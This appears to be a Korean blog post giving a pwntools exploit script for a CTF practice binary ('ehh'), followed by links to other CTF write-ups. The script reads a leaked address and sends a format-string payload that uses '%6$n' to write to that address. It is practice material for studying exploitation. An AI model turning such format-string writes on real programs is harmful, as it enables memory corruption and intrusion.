exploit.py

 

from pwn import *
 
p = process("./ehh")

p.recvuntil("here< ")
protect_addr = int(p.recv(10),16)

payload = p32(protect_addr)
payload += "%20x"
payload += "%6$n"

p.recv()
sleep(0.1)
p.sendline(payload)
sleep(0.1)
print p.recv()

'System > Pwnable Practice' 카테고리의 다른 글

pico CTF 2018 echo back  (0) 2019.08.12
picoCTF 2018 authenticate  (0) 2019.08.10
Plaid CTF 2015 ebp  (0) 2019.08.06
Layer7 CTF 2018 Life Game  (0) 2019.08.05
Pico CTF 2018 echooo  (0) 2019.08.04
블로그 이미지

JeonYoungSin

메모 기록용 공간

,